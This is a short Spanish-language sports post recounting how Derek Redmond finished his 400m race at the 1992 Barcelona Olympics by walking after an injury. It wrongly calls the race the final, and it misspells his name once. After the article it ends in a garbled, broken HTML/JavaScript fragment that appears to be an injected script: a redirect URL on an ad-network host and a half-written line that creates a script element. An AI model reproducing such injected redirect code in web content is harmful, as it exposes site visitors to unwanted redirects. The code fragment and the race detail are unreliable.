#HistoriasDeJuegosOlímpicos Derek Redmond, llegar al último no siempre es perder 

Juegos Olímpicos de Barcelona 1992, final de los 400m planos, en el carril 5, Derek Radmond, uno de los favoritos para ganar la medalla de oro, y aunque no la ganó, nos demostró que llegar al último, no siempre significa perder.

Lo que sucedió en los Juegos Olímpicos de Barcelona es uno de los momentos más icónicos de la justa veraniega. El corredor británico demostró que el orgullo en una competencia de tal magnitud está por delante y, aún cuando se lesionó en los primeros metros de la competencia, Redmond tuvo el valor y coraje para terminar la prueba caminando.

 

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

var d=document;var s=d.createElement(»);